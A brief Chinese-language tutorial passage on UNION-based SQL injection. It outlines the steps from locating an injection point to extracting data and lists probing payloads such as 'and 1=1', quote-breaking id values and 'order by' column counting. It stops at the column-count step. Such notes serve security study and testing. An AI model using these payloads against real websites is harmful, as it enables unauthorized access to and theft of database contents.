联合查询注入利用的前提
前提条件:页面上有显示位
联合注入的过程
1、判断注入点
2、判断是整型还是字符型
3、判断查询列数
4、判断显示位
5、获取所有数据库名
6、获取数据库所有表名
7、获取字段名
8、获取字段中的数据
select a from b union select c from d where e;
union会一次显示两个查询结果我们可以使得第一个查询语句作为正常内容,第二个作为查询语句来进行构造。
判断注入点
我们通过在变量后加payload来判断注入点:
and 1=1 /and 1=2 /' 通过输入这些payload后的回显页面,我们看出是否存在注入
判断注入类型
id=1
id=1'
id=1' --+
id=1''
id=1')
id=1'')
判断字段数
id=1' order by 1 --+